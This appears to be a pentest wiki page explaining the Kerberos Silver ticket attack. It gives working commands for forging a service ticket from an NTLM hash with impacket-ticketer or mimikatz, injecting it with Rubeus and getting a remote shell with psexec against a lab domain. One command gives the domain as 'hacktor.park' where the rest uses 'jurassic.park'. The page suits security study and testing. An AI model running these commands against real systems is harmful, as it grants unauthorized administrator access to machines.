Silver ticket

The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of a user account is owned. Thus, it is possible to gain access to that service by forging a custom TGS with the maximum privileges inside it.

In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service.

Create Specification Ticket for Service

silver (nthash + sid + username + password)

Linux

impacket-ticketer -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain hacktor.park -spn cifs/labwws02.jurassic.park  stegosaurus

export KRB5CCNAME=/root/stegosaurus.ccache

impacket-psexec jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass

Execution is similar to PTT attacks, but in this case the ticket is created manually. After that, as usual, it is possible to set the ticket in the KRB5CCNAME environment variable and use it with the -no-pass -k parameters in any of the impacket examples.

Windows

.\mimikatz.exe

privilege::debug

kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park
exit
.\Rubeus.exe ptt /ticket:ticket.kirbi
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

Additionally, the Mimikatz module kerberos::ptt can be used to inject the ticket instead of using Rubeus, as shown in the PTT attack section.

PreviousPTH, PTT, Overpth, ptk NextGolden ticket

Last updated 10 months ago